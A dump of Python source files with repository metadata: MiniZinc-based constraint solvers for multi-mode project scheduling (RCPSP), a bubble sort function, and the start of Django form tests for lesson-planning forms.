    ``files_mzn["multi"]`` / ``files_mzn["multi-calendar"]``.

    Mode choices are encoded in the CP model by a boolean array ``mrun`` over
    a global 1-based mode index; ``self.modeindex_map`` translates that index
    back to ``(task, original_mode_index)`` when decoding solutions.
    """
    def __init__(self,
                 rcpsp_model: RCPSPModel,
                 cp_solver_name: CPSolverName=CPSolverName.CHUFFED,
                 params_objective_function: ParamsObjectiveFunction=None, **kwargs):
        self.rcpsp_model = rcpsp_model
        # The minizinc Instance is built lazily by init_model().
        self.instance = None
        self.cp_solver_name = cp_solver_name
        self.key_decision_variable = ["start", "mrun"] # For now, I've put the var names of the CP model (not the rcpsp_model)
        # Aggregation callables turning a solution's evaluation dict into a
        # single scalar fitness.
        self.aggreg_sol, self.aggreg_from_dict_values, self.params_objective_function = \
            build_aggreg_function_and_params_objective(self.rcpsp_model,
                                                       params_objective_function=params_objective_function)
        # Calendar models (time-varying resource capacity) use a dedicated
        # MiniZinc file.
        self.calendar = False
        if isinstance(self.rcpsp_model, RCPSPModelCalendar):
            self.calendar = True

    def init_model(self, **args):
        """Build the minizinc ``Instance`` for the multi-mode model.

        Keyword args:
            model_type: explicit model key in ``files_mzn``; defaults to
                "multi" or "multi-calendar" depending on ``self.calendar``.
            output_type: if truthy, solutions are parsed into ``RCPSPSolCP``.
            partial_solution: optional ``PartialSolution`` posted as hard
                constraints on ``start`` and ``mrun``.
        """
        model_type = args.get("model_type", None)
        if model_type is None:
            model_type = "multi" if not self.calendar else "multi-calendar"
        model = Model(files_mzn[model_type])
        custom_output_type = args.get("output_type", False)
        if custom_output_type:
            model.output_type = RCPSPSolCP
            self.custom_output_type = True
        solver = Solver.lookup(map_cp_solver_name[self.cp_solver_name])
        resources_list = list(self.rcpsp_model.resources.keys())
        self.resources_index = resources_list
        instance = Instance(solver, model)
        n_res = len(resources_list)
        # `keys` records the dzn parameter names fed to the instance
        # (kept for debugging/dzn export below).
        keys = []
        instance["n_res"] = n_res
        keys += ["n_res"]
        # rc = [val for val in self.rcpsp_model.resources.values()]
        # # print('rc: ', rc)
        # instance["rc"] = rc
        # Tasks include the two dummy source/sink jobs (hence +2).
        n_tasks = self.rcpsp_model.n_jobs + 2
        instance["n_tasks"] = n_tasks
        keys += ["n_tasks"]
        sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
        # Total number of (task, mode) options across all tasks.
        n_opt = sum([len(list(self.rcpsp_model.mode_details[key].keys())) for key in sorted_tasks])
        instance["n_opt"] = n_opt
        keys += ["n_opt"]
        # Build the per-task sets of global mode indices, the flat duration
        # array, and the map from global index back to (task, original mode).
        modes = []
        dur = []
        self.modeindex_map = {}
        general_counter = 1
        for act in sorted_tasks:
            tmp = sorted(self.rcpsp_model.mode_details[act].keys())
            set_mode_task = set()
            for i in range(len(tmp)):
                original_mode_index = tmp[i]
                set_mode_task.add(general_counter)
                self.modeindex_map[general_counter] = {'task': act, 'original_mode_index': original_mode_index}
                general_counter += 1
            modes.append(set_mode_task)
            dur = dur + [self.rcpsp_model.mode_details[act][key]['duration']
                         for key in tmp]
        instance['modes'] = modes
        keys += ["modes"]
        instance['dur'] = dur
        keys += ["dur"]
        # rreq[resource][global mode index] = resource request of that mode.
        rreq = []
        index = 0
        for res in resources_list:
            rreq.append([])
            for task in sorted_tasks:
                for mod in sorted(self.rcpsp_model.mode_details[task].keys()):
                    rreq[index].append(int(self.rcpsp_model.mode_details[task][mod][res]))
            index += 1
        instance["rreq"] = rreq
        keys += ["rreq"]
        # Resource capacities: for calendar models the max over time is used
        # here; the per-time-step profile is passed separately below.
        if not self.calendar:
            rcap = [int(self.rcpsp_model.resources[x]) for x in resources_list]
        else:
            rcap = [int(max(self.rcpsp_model.resources[x])) for x in resources_list]
        instance["rcap"] = rcap
        keys += ["rcap"]
        # Resource type: 2 = non-renewable, 1 = renewable.
        rtype = [2 if res in self.rcpsp_model.non_renewable_resources else 1
                 for res in resources_list]
        instance["rtype"] = rtype
        keys += ["rtype"]
        succ = [set(self.rcpsp_model.successors[task]) for task in sorted_tasks]
        instance["succ"] = succ
        keys += ["succ"]
        if self.calendar:
            # Horizon = length of the capacity profile of any one resource.
            one_ressource = list(self.rcpsp_model.resources.keys())[0]
            instance["max_time"] = len(self.rcpsp_model.resources[one_ressource])
            print(instance["max_time"])
            keys += ["max_time"]
            ressource_capacity_time = [[int(x) for x in self.rcpsp_model.resources[res]]
                                       for res in resources_list]
            instance["ressource_capacity_time"] = ressource_capacity_time
            keys += ["ressource_capacity_time"]
        # import pymzn
        # pymzn.dict2dzn({key: instance[key] for key in keys},
        #                fout='rcpsp_.dzn')
        self.instance = instance
        # Encode the partial solution hints as extra MiniZinc constraints over
        # "start" and "mrun".
        p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
        if p_s is not None:
            constraint_strings = []
            if p_s.start_times is not None:
                for task in p_s.start_times:
                    string = "constraint start[" + str(task) + "] == " + str(p_s.start_times[task]) + ";\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]
            if p_s.partial_permutation is not None:
                for t1, t2 in zip(p_s.partial_permutation[:-1], p_s.partial_permutation[1:]):
                    string = "constraint start[" + str(t1) + "] <= start[" + str(t2) + "];\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]
            if p_s.list_partial_order is not None:
                for l in p_s.list_partial_order:
                    for t1, t2 in zip(l[:-1], l[1:]):
                        string = "constraint start[" + str(t1) + "] <= start[" + str(t2) + "];\n"
                        self.instance.add_string(string)
                        constraint_strings += [string]
            if p_s.task_mode is not None:
                # NOTE(review): this iterates p_s.start_times (not
                # p_s.task_mode) and `len(indexes) >= 0` is always true, so
                # indexes[0] raises IndexError when no match exists — likely
                # meant `for task in p_s.task_mode` and `len(indexes) > 0`.
                for task in p_s.start_times:
                    indexes = [i for i in self.modeindex_map if self.modeindex_map[i]["task"] == task
                               and self.modeindex_map[i]["original_mode_index"] == p_s.task_mode[task]]
                    if len(indexes) >= 0:
                        string = "constraint mrun["+str(indexes[0])+"] == 1;"
                        self.instance.add_string(string)
                        constraint_strings += [string]
            if p_s.start_together is not None:
                for t1, t2 in p_s.start_together:
                    string = "constraint start[" + str(t1) + "] == start[" + str(t2) + "];\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]
            if p_s.start_after_nunit is not None:
                for t1, t2, delta in p_s.start_after_nunit:
                    string = "constraint start[" + str(t2) + "] >= start[" + str(t1) + "]+"+str(delta)+";\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]
            if p_s.start_at_end_plus_offset is not None:
                for t1, t2, delta in p_s.start_at_end_plus_offset:
                    string = "constraint start[" + str(t2) + "] >= start[" + str(t1) + "]+adur["+str(t1)+"]+"+str(delta)+";\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]
            if p_s.start_at_end is not None:
                for t1, t2 in p_s.start_at_end:
                    string = "constraint start[" + str(t2) + "] == start[" + str(t1) + "]+adur["+str(t1)+"];\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]

    def retrieve_solutions(self, result, parameters_cp: ParametersCP=ParametersCP.default()):
        """Convert a minizinc result into a ``ResultStorage`` of RCPSPSolution.

        Start times are read from "start" and the selected modes are decoded
        from the boolean array "mrun" through ``self.modeindex_map``; the
        dummy source/sink tasks are forced to mode 1.
        """
        intermediate_solutions = parameters_cp.intermediate_solution
        best_solution = None
        best_makespan = -float("inf")
        list_solutions_fit = []
        starts = []
        mruns = []
        if intermediate_solutions:
            for i in range(len(result)):
                if isinstance(result[i], RCPSPSolCP):
                    starts += [result[i].dict["start"]]
                    mruns += [result[i].dict["mrun"]]
                else:
                    starts += [result[i, "start"]]
                    mruns += [result[i, "mrun"]]
        else:
            if isinstance(result, RCPSPSolCP):
                starts += [result.dict["start"]]
                mruns += [result.dict["mrun"]]
            else:
                starts = [result["start"]]
                mruns = [result["mrun"]]
        for start_times, mrun in zip(starts, mruns):
            modes = []
            # A true mrun[i] selects global mode index i+1 for its task.
            for i in range(len(mrun)):
                if mrun[i] and (self.modeindex_map[i + 1]['task'] != 1) and (
                        self.modeindex_map[i + 1]['task'] != self.rcpsp_model.n_jobs + 2):
                    modes.append(self.modeindex_map[i + 1]['original_mode_index'])
                elif (self.modeindex_map[i + 1]['task'] == 1) or (
                        self.modeindex_map[i + 1]['task'] == self.rcpsp_model.n_jobs + 2):
                    modes.append(1)
            rcpsp_schedule = {}
            for i in range(len(start_times)):
                rcpsp_schedule[i + 1] = {'start_time': start_times[i],
                                         'end_time': start_times[i]
                                         + self.rcpsp_model.mode_details[i + 1][modes[i]]['duration']}
            # rcpsp_modes excludes the dummy source and sink tasks.
            sol = RCPSPSolution(problem=self.rcpsp_model,
                                rcpsp_schedule=rcpsp_schedule,
                                rcpsp_modes=modes[1:-1],
                                rcpsp_schedule_feasible=True)
            objective = self.aggreg_from_dict_values(self.rcpsp_model.evaluate(sol))
            if objective > best_makespan:
                best_makespan = objective
                best_solution = sol.copy()
            list_solutions_fit += [(sol, objective)]
        result_storage = ResultStorage(list_solution_fits=list_solutions_fit,
                                       best_solution=best_solution,
                                       mode_optim=self.params_objective_function.sense_function,
                                       limit_store=False)
        return result_storage

    def solve(self, parameters_cp: ParametersCP=ParametersCP.default(), **args):
        """Run the CP backend and return a ``ResultStorage``.

        Extra ``args`` are forwarded to ``init_model`` on the first call.
        """
        if self.instance is None:
            self.init_model(**args)
        timeout = parameters_cp.TimeLimit
        intermediate_solutions = parameters_cp.intermediate_solution
        result = self.instance.solve(timeout=timedelta(seconds=timeout),
                                     intermediate_solutions=intermediate_solutions)
        verbose = args.get("verbose", True)
        if verbose:
            print(result.status)
        return self.retrieve_solutions(result=result, parameters_cp=parameters_cp)
class MRCPSP_Result:
    """Custom minizinc output type for the "multi-no-bool" model.

    The model's custom output item is a JSON-encoded list of chosen mode
    indices, decoded into ``self.mode_chosen``; all remaining output
    variables are kept in ``self.dict``.
    """
    objective: int
    __output_item: InitVar[str] = None

    def __init__(self, objective, _output_item, **kwargs):
        # Decode the JSON payload first, then store objective and outputs.
        self.mode_chosen = json.loads(_output_item)
        self.objective = objective
        self.dict = kwargs

    def check(self) -> bool:
        """Validation hook called by minizinc; accept every solution."""
        return True
class CP_MRCPSP_MZN_NOBOOL(CPSolver):
    """Multi-mode RCPSP CP solver using the "multi-no-bool" MiniZinc model.

    Unlike ``CP_MRCPSP_MZN``, the chosen mode per task is emitted by the model
    as a JSON list in the custom output item (parsed by ``MRCPSP_Result``)
    instead of a boolean ``mrun`` array.
    """
    def __init__(self,
                 rcpsp_model: RCPSPModel,
                 cp_solver_name: CPSolverName=CPSolverName.CHUFFED,
                 params_objective_function: ParamsObjectiveFunction=None, **kwargs):
        self.rcpsp_model = rcpsp_model
        # The minizinc Instance is built lazily by init_model().
        self.instance = None
        self.cp_solver_name = cp_solver_name
        self.key_decision_variable = ["start", "mrun"] # For now, I've put the var names of the CP model (not the rcpsp_model)
        # Aggregation callables turning a solution's evaluation dict into a
        # single scalar fitness.
        self.aggreg_sol, self.aggreg_from_dict_values, self.params_objective_function = \
            build_aggreg_function_and_params_objective(self.rcpsp_model,
                                                       params_objective_function=params_objective_function)
        # Calendar models (time-varying resource capacity) get extra dzn data.
        self.calendar = False
        if isinstance(self.rcpsp_model, RCPSPModelCalendar):
            self.calendar = True

    def init_model(self, **args):
        """Build the minizinc ``Instance`` for the "multi-no-bool" model.

        Keyword args:
            partial_solution: optional ``PartialSolution`` posted as hard
                constraints on ``start`` and ``mrun``.
        """
        model = Model(files_mzn["multi-no-bool"])
        # Solutions are always parsed through MRCPSP_Result (JSON mode list).
        model.output_type = MRCPSP_Result
        solver = Solver.lookup(map_cp_solver_name[self.cp_solver_name])
        resources_list = list(self.rcpsp_model.resources.keys())
        instance = Instance(solver, model)
        n_res = len(resources_list)
        # `keys` records the dzn parameter names fed to the instance
        # (kept for debugging/dzn export below).
        keys = []
        instance["n_res"] = n_res
        keys += ["n_res"]
        # rc = [val for val in self.rcpsp_model.resources.values()]
        # # print('rc: ', rc)
        # instance["rc"] = rc
        # Tasks include the two dummy source/sink jobs (hence +2).
        n_tasks = self.rcpsp_model.n_jobs + 2
        instance["n_tasks"] = n_tasks
        keys += ["n_tasks"]
        sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
        # Total number of (task, mode) options across all tasks.
        n_opt = sum([len(list(self.rcpsp_model.mode_details[key].keys())) for key in sorted_tasks])
        instance["n_opt"] = n_opt
        keys += ["n_opt"]
        modes = []
        dur = []
        # NOTE(review): `counter` is never used below — leftover variable.
        counter = 0
        # Map from global 1-based mode index (as used by the CP model) back to
        # (task, original mode index).
        self.modeindex_map = {}
        general_counter = 1
        for act in sorted_tasks:
            tmp = sorted(self.rcpsp_model.mode_details[act].keys())
            set_mode_task = set()
            for i in range(len(tmp)):
                original_mode_index = tmp[i]
                set_mode_task.add(general_counter)
                self.modeindex_map[general_counter] = {'task': act, 'original_mode_index': original_mode_index}
                general_counter += 1
            modes.append(set_mode_task)
            dur = dur + [self.rcpsp_model.mode_details[act][key]['duration']
                         for key in tmp]
        instance['modes'] = modes
        keys += ["modes"]
        instance['dur'] = dur
        keys += ["dur"]
        # rreq[resource][global mode index] = resource request of that mode.
        rreq = []
        index = 0
        for res in resources_list:
            rreq.append([])
            for task in sorted_tasks:
                for mod in sorted(self.rcpsp_model.mode_details[task].keys()):
                    rreq[index].append(int(self.rcpsp_model.mode_details[task][mod][res]))
            index += 1
        instance["rreq"] = rreq
        keys += ["rreq"]
        if not self.calendar:
            # NOTE(review): unlike CP_MRCPSP_MZN, capacities are not cast to
            # int here — confirm the model accepts the raw values.
            rcap = [self.rcpsp_model.resources[x] for x in resources_list]
        else:
            rcap = [int(max(self.rcpsp_model.resources[x])) for x in resources_list]
        instance["rcap"] = rcap
        keys += ["rcap"]
        # Resource type: 2 = non-renewable, 1 = renewable.
        rtype = [2 if res in self.rcpsp_model.non_renewable_resources else 1
                 for res in resources_list]
        instance["rtype"] = rtype
        keys += ["rtype"]
        succ = [set(self.rcpsp_model.successors[task]) for task in sorted_tasks]
        instance["succ"] = succ
        keys += ["succ"]
        if self.calendar:
            # Horizon = length of the capacity profile of any one resource.
            one_ressource = list(self.rcpsp_model.resources.keys())[0]
            instance["max_time"] = len(self.rcpsp_model.resources[one_ressource])
            print(instance["max_time"])
            keys += ["max_time"]
            ressource_capacity_time = [[int(x) for x in self.rcpsp_model.resources[res]]
                                       for res in resources_list]
            instance["ressource_capacity_time"] = ressource_capacity_time
            keys += ["ressource_capacity_time"]
        # import pymzn
        # pymzn.dict2dzn({key: instance[key] for key in keys},
        #                fout='rcpsp_.dzn')
        self.instance = instance
        # Encode the partial solution hints as extra MiniZinc constraints.
        p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
        if p_s is not None:
            constraint_strings = []
            if p_s.start_times is not None:
                for task in p_s.start_times:
                    string = "constraint start[" + str(task) + "] == " + str(p_s.start_times[task]) + ";\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]
            if p_s.partial_permutation is not None:
                for t1, t2 in zip(p_s.partial_permutation[:-1], p_s.partial_permutation[1:]):
                    string = "constraint start[" + str(t1) + "] <= start[" + str(t2) + "];\n"
                    self.instance.add_string(string)
                    constraint_strings += [string]
            if p_s.list_partial_order is not None:
                for l in p_s.list_partial_order:
                    for t1, t2 in zip(l[:-1], l[1:]):
                        string = "constraint start[" + str(t1) + "] <= start[" + str(t2) + "];\n"
                        self.instance.add_string(string)
                        constraint_strings += [string]
            if p_s.task_mode is not None:
                # NOTE(review): iterates p_s.start_times (not p_s.task_mode)
                # and `len(indexes) >= 0` is always true, so indexes[0] raises
                # IndexError when no match exists — same issue as in
                # CP_MRCPSP_MZN.init_model.
                for task in p_s.start_times:
                    indexes = [i for i in self.modeindex_map if self.modeindex_map[i]["task"] == task
                               and self.modeindex_map[i]["original_mode_index"] == p_s.task_mode[task]]
                    if len(indexes) >= 0:
                        string = "constraint mrun["+str(indexes[0])+"] == 1;"
                        self.instance.add_string(string)
                        constraint_strings += [string]

    def retrieve_solutions(self, result, parameters_cp: ParametersCP=ParametersCP.default()):
        """Convert a minizinc result into a ``ResultStorage`` of RCPSPSolution.

        Solutions arrive as ``MRCPSP_Result`` objects: start times come from
        ``res.dict["start"]`` and modes from the JSON-decoded
        ``res.mode_chosen`` (global indices translated via
        ``self.modeindex_map``); dummy source/sink tasks are forced to mode 1.
        """
        intermediate_solutions = parameters_cp.intermediate_solution
        best_solution = None
        best_makespan = -float("inf")
        list_solutions_fit = []
        # NOTE(review): `starts` and `mruns` are unused in this variant.
        starts = []
        mruns = []
        object_result: List[MRCPSP_Result] = []
        if intermediate_solutions:
            for i in range(len(result)):
                object_result += [result[i]]
                # print("Objective : ", result[i, "objective"])
        else:
            object_result += [result]
        for res in object_result:
            modes = []
            for j in range(len(res.mode_chosen)):
                if (self.modeindex_map[j + 1]['task'] != 1) and (self.modeindex_map[j + 1]['task'] != self.rcpsp_model.n_jobs + 2):
                    modes.append(self.modeindex_map[res.mode_chosen[j]]['original_mode_index'])
                elif (self.modeindex_map[j + 1]['task'] == 1) or (
                        self.modeindex_map[j + 1]['task'] == self.rcpsp_model.n_jobs + 2):
                    modes.append(1)
            rcpsp_schedule = {}
            start_times = res.dict["start"]
            for i in range(len(start_times)):
                rcpsp_schedule[i + 1] = {'start_time': start_times[i],
                                         'end_time': start_times[i]
                                         + self.rcpsp_model.mode_details[i + 1][modes[i]]['duration']}
            # rcpsp_modes excludes the dummy source and sink tasks.
            sol = RCPSPSolution(problem=self.rcpsp_model,
                                rcpsp_schedule=rcpsp_schedule,
                                rcpsp_modes=modes[1:-1],
                                rcpsp_schedule_feasible=True)
            objective = self.aggreg_from_dict_values(self.rcpsp_model.evaluate(sol))
            if objective > best_makespan:
                best_makespan = objective
                best_solution = sol.copy()
            list_solutions_fit += [(sol, objective)]
        result_storage = ResultStorage(list_solution_fits=list_solutions_fit,
                                       best_solution=best_solution,
                                       mode_optim=self.params_objective_function.sense_function,
                                       limit_store=False)
        return result_storage

    def solve(self, parameters_cp: ParametersCP=ParametersCP.default(), **args):
        """Run the CP backend and return a ``ResultStorage``.

        Extra ``args`` are forwarded to ``init_model`` on the first call.
        """
        if self.instance is None:
            self.init_model(**args)
        timeout = parameters_cp.TimeLimit
        intermediate_solutions = parameters_cp.intermediate_solution
        result = self.instance.solve(timeout=timedelta(seconds=timeout),
                                     intermediate_solutions=intermediate_solutions)
        verbose = args.get("verbose", True)
        if verbose:
            print(result.status)
        return self.retrieve_solutions(result=result, parameters_cp=parameters_cp)
class CP_MRCPSP_MZN_MODES:
    """CP model that searches feasible *mode assignments* for a multi-mode
    RCPSP (the "modes" minizinc model) without building a schedule.

    Typically used to seed other solvers with feasible mode choices; the
    solutions are returned as plain lists of mode indices per task.
    """

    def __init__(self, rcpsp_model: RCPSPModel,
                 cp_solver_name: CPSolverName=CPSolverName.CHUFFED,
                 params_objective_function: ParamsObjectiveFunction=None):
        self.rcpsp_model = rcpsp_model
        self.instance: Instance = None
        self.cp_solver_name = cp_solver_name
        # For now, I've put the var names of the CP model (not the rcpsp_model)
        self.key_decision_variable = ["start", "mrun"]
        self.aggreg_sol, self.aggreg_from_dict_values, self.params_objective_function = \
            build_aggreg_function_and_params_objective(self.rcpsp_model,
                                                       params_objective_function=params_objective_function)

    def init_model(self, **args):
        """Instantiate the minizinc "modes" model from the rcpsp data.

        Accepts an optional ``partial_solution`` kwarg (a PartialSolution)
        whose ``task_mode`` entries are enforced via extra constraints.
        """
        model = Model(files_mzn["modes"])
        solver = Solver.lookup(map_cp_solver_name[self.cp_solver_name])
        instance = Instance(solver, model)
        keys = []
        n_res = len(list(self.rcpsp_model.resources.keys()))
        instance["n_res"] = n_res
        keys += ["n_res"]
        # +2 accounts for the artificial source and sink tasks.
        n_tasks = self.rcpsp_model.n_jobs + 2
        instance["n_tasks"] = n_tasks
        keys += ["n_tasks"]
        sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
        n_opt = sum([len(list(self.rcpsp_model.mode_details[key].keys())) for key in sorted_tasks])
        instance["n_opt"] = n_opt
        keys += ["n_opt"]
        # Build one contiguous index per (task, mode) pair and remember the
        # mapping back to the original task/mode for solution parsing.
        modes = []
        counter = 0
        self.modeindex_map = {}
        for act in sorted_tasks:
            tmp = list(self.rcpsp_model.mode_details[act].keys())
            # tmp = [counter + x for x in tmp]
            for i in range(len(tmp)):
                original_mode_index = tmp[i]
                mod_index = counter+tmp[i]
                tmp[i] = mod_index
                self.modeindex_map[mod_index] = {'task': act, 'original_mode_index': original_mode_index}
            modes.append(set(tmp))
            counter = tmp[-1]
        # print('modes: ', modes)
        instance['modes'] = modes
        keys += ["modes"]
        # rreq[r][opt]: requirement of resource r for each (task, mode) option,
        # flattened in the same order as the contiguous mode indices above.
        rreq = []
        index = 0
        for res in self.rcpsp_model.resources.keys():
            rreq.append([])
            for task in sorted_tasks:
                for mod in self.rcpsp_model.mode_details[task].keys():
                    rreq[index].append(int(self.rcpsp_model.mode_details[task][mod][res]))
            index += 1
        # print('rreq: ', rreq)
        instance["rreq"] = rreq
        keys += ["rreq"]
        rcap = [val for val in self.rcpsp_model.resources.values()]
        # print('rcap: ', rcap)
        # Time-varying capacities (lists) are collapsed to their maximum.
        if isinstance(rcap[0], list):
            rcap = [int(max(r)) for r in rcap]
        instance["rcap"] = rcap
        keys += ["rcap"]
        # rtype: 2 = non-renewable resource, 1 = renewable.
        rtype = [2 if res in self.rcpsp_model.non_renewable_resources else 1 for res in self.rcpsp_model.resources.keys()]
        instance["rtype"] = rtype
        keys += ["rtype"]
        # import pymzn # For debug purposes
        # pymzn.dict2dzn({k: instance[k] for k in keys}, fout="debug_modes_satisfaction.dzn")
        self.instance: Instance = instance
        p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
        if p_s is not None:
            constraint_strings = []
            if p_s.task_mode is not None:
                for task in p_s.start_times:
                    indexes = [i for i in self.modeindex_map if self.modeindex_map[i]["task"] == task
                               and self.modeindex_map[i]["original_mode_index"] == p_s.task_mode[task]]
                    # Bug fix: this used to test ``len(indexes) >= 0`` which is
                    # always true and crashed on ``indexes[0]`` when no
                    # (task, mode) pair matched the partial solution.
                    if len(indexes) > 0:
                        print("Index found : ", len(indexes))
                        string = "constraint mrun[" + str(indexes[0]) + "] == 1;"
                        self.instance.add_string(string)
                        constraint_strings += [string]

    def retrieve_solutions(self, result, parameters_cp: ParametersCP = None):
        """Turn solver output into a list of mode vectors (one per solution).

        Each vector has ``n_jobs + 2`` entries; source and sink keep mode 1.
        ``parameters_cp`` defaults to ``ParametersCP.default()`` (resolved in
        the body to avoid the mutable-default pitfall).
        """
        if parameters_cp is None:
            parameters_cp = ParametersCP.default()
        intermediate_solutions = parameters_cp.intermediate_solution
        mruns = []
        if intermediate_solutions:
            for i in range(len(result)):
                mruns += [result[i, "mrun"]]
        else:
            mruns += [result["mrun"]]
        all_modes = []
        for mrun in mruns:
            # Default every task (including source/sink) to mode 1.
            modes = [1]*(self.rcpsp_model.n_jobs+2)
            for i in range(len(mrun)):
                if mrun[i] == 1 and (self.modeindex_map[i + 1]['task'] != 1) and (
                        self.modeindex_map[i + 1]['task'] != self.rcpsp_model.n_jobs + 2):
                    modes[self.modeindex_map[i+1]['task']-1] = self.modeindex_map[i + 1]['original_mode_index']
            all_modes += [modes]
        return all_modes

    def solve(self, parameters_cp: ParametersCP = None, **args):
        """Build the model if needed, run the solver and parse mode vectors.

        ``args`` are forwarded to :meth:`init_model`; ``verbose`` (default
        False) prints the solver status.
        """
        if parameters_cp is None:
            parameters_cp = ParametersCP.default()
        if self.instance is None:
            self.init_model(**args)
        timeout = parameters_cp.TimeLimit
        # Currently unused: the intermediate_solutions kwarg of the solver
        # call below is commented out.
        intermediate_solutions = parameters_cp.intermediate_solution
        result = self.instance.solve(timeout=timedelta(seconds=timeout),
                                     # nr_solutions=1000,
                                     # nr_solutions=1,
                                     nr_solutions=parameters_cp.nr_solutions
                                     if not parameters_cp.all_solutions else None,
                                     all_solutions=parameters_cp.all_solutions)
        # intermediate_solutions=intermediate_solutions)
        verbose = args.get("verbose", False)
        if verbose:
            print(result.status)
        return self.retrieve_solutions(result=result, parameters_cp=parameters_cp)
| [
"guillaume.alleon@gmail.com"
] | guillaume.alleon@gmail.com |
67122d17e933488f9e88e64701632d1088a4001e | 31c9cd96667166ac4af15ce8b48753167da3084d | /sorting/bubble_sort.py | 1c21807ac98a7e18e5e4c1b990067d0c11664874 | [] | no_license | vitorponce/algorithms | a8e305e32e38bbb2f473dc07c0e93bdf6a10fde0 | 87d5f3e3110394d21844b7f3a17468e01a366e83 | refs/heads/master | 2022-06-17T04:04:18.757909 | 2020-05-04T03:03:09 | 2020-05-04T03:03:09 | 259,844,564 | 1 | 0 | null | 2020-05-04T03:04:54 | 2020-04-29T06:34:52 | Python | UTF-8 | Python | false | false | 1,717 | py |
def bubble_sort(input_list):
    """Sort ``input_list`` in place with an adaptive bubble sort.

    On every pass the smallest remaining element "bubbles" toward the
    front by swapping adjacent out-of-order neighbours, so after pass k
    the first k positions hold their final values.

    Complexity: O(n^2) comparisons/swaps in the worst case (descending
    input), but adaptive — a pass with no swaps proves the list is
    already sorted and terminates early, giving O(n) on sorted input.
    Stable (equal elements keep their relative order) and in-place
    (O(1) extra memory).

    :param input_list: list of mutually comparable items; mutated in place.
    :return: the same list object, sorted ascending.
    """
    size = len(input_list)
    for sorted_upto in range(size):
        made_swap = False
        # Walk from the tail down to the first unsorted position,
        # carrying the smallest remaining element to the front.
        pos = size - 1
        while pos > sorted_upto:
            if input_list[pos] < input_list[pos - 1]:
                input_list[pos - 1], input_list[pos] = (
                    input_list[pos], input_list[pos - 1])
                made_swap = True
            pos -= 1
        # A swap-free pass means everything is already ordered.
        if not made_swap:
            break
    return input_list
| [
"johneshiver@gmail.com"
] | johneshiver@gmail.com |
f2adc406f14969652f3164a491950f2f9bffb8cb | be30bbbf845fb27b6073aa64f9700fb1b6866b04 | /planificaciones/tests/test_forms.py | 055f9a6377adbe3b4694f3f1eca0bc9d62e5ac1f | [] | no_license | cesardlinx/asistentecatedra | ef34aae2f981e864b3e858c05efe9524c6e5a8c3 | 8ff935383fa9355d4f47c358a9971cff8ab8a92c | refs/heads/master | 2020-04-17T10:03:28.583461 | 2020-01-07T18:03:05 | 2020-01-07T18:03:05 | 166,485,635 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,103 | py | import pytest
from planificaciones.forms.elemento_curricular_formset import \
ElementoCurricularFormset
from planificaciones.forms.desarrollo_unidad_formset import \
DesarrolloUnidadFormset
from planificaciones.forms.actividad_aprendizaje_formset import \
ActividadAprendizajeFormset
from planificaciones.forms.plan_destrezas_form import PlanDestrezasForm
from planificaciones.forms.plan_anual_form import PlanAnualForm
from planificaciones.forms.plan_unidad_form import PlanUnidadForm
from planificaciones.forms.plan_clase_form import PlanClaseForm
from .planificaciones_testcase import PlanificacionesTestCase
from django.core.exceptions import ValidationError
pytestmark = pytest.mark.django_db
class TestPlanClaseForm(PlanificacionesTestCase):
    """Validation tests for ``PlanClaseForm`` (lesson-plan form)."""
    def setUp(self):
        super().setUp()
        # Complete, valid POST-style payload; fixture objects
        # (asignatura, cursos, objetivos...) come from the base test case.
        self.data = {
            'name': 'Plan de Clase1',
            'docentes': 'David',
            'numero_plan': 2,
            'fecha': '2019-01-20',
            'asignatura': self.asignatura.id,
            'cursos': [str(self.curso_1.id), str(self.curso_2.id)],
            'paralelos': 'A y C',
            'numero_estudiantes': '23',
            'tema': 'Tema del plan',
            'periodos': 'Períodos del plan',
            'metodologia': 'Metodología del plan de clase',
            'tecnica': 'Tecnica usada',
            'objetivos': [str(self.objetivo_1.id), str(self.objetivo_2.id)],
            'bibliografia': 'Lorem ipsum dolor sit amet.',
            'contenido_cientifico': 'Lorem ipsum dolor sit amet.',
            'material_didactico': 'Lorem ipsum dolor sit amet.',
            'instrumento_evaluacion': 'Lorem ipsum dolor sit amet.',
        }
    def test_valid_data(self):
        # A complete payload must validate.
        form = PlanClaseForm(self.data)
        assert form.is_valid() is True, 'The form should be valid'
    def test_empty_data(self):
        # Missing required fields -> invalid.
        form = PlanClaseForm({})
        assert form.is_valid() is False, 'The form should be invalid'
    def test_invalid_data(self):
        # A non-numeric value for the 'asignatura' FK must fail validation.
        data = self.data
        data['asignatura'] = 'lorem ipsum'
        form = PlanClaseForm(data)
        assert form.is_valid() is False, 'The form should be invalid'
class TestElementoCurricularFormset(PlanificacionesTestCase):
    """Validation tests for the nested ElementoCurricular formset.

    The payload carries Django formset management data plus a nested
    "procesos didacticos" formset per elemento curricular.
    """
    def setUp(self):
        super().setUp()
        self.data = {
            'asignatura': self.asignatura.id,
            'cursos': [self.curso_1.id, self.curso_2.id],
            # Formset Elementos curriculares 1
            'elementos_curriculares-TOTAL_FORMS': '2',
            'elementos_curriculares-INITIAL_FORMS': '0',
            'elementos_curriculares-MIN_NUM_FORMS': '0',
            'elementos_curriculares-MAX_NUM_FORMS': '1000',
            'elementos_curriculares-0-destreza': self.destreza_1.id,
            'elementos_curriculares-0-conocimientos_asociados': 'lorem ipsum',
            'elementos_curriculares-0-actividades_evaluacion': 'lorem ipsum',
            'elementos_curriculares-1-destreza': self.destreza_1.id,
            'elementos_curriculares-1-conocimientos_asociados': 'lorem ipsum',
            'elementos_curriculares-1-actividades_evaluacion': 'lorem ipsum',
            # Formset Procesos didacticos
            'proceso-elementos_curriculares-0-procesos_didacticos-'\
            'TOTAL_FORMS': '2',
            'proceso-elementos_curriculares-0-procesos_didacticos-'\
            'INITIAL_FORMS': '0',
            'proceso-elementos_curriculares-0-procesos_didacticos-'\
            'MIN_NUM_FORMS': '0',
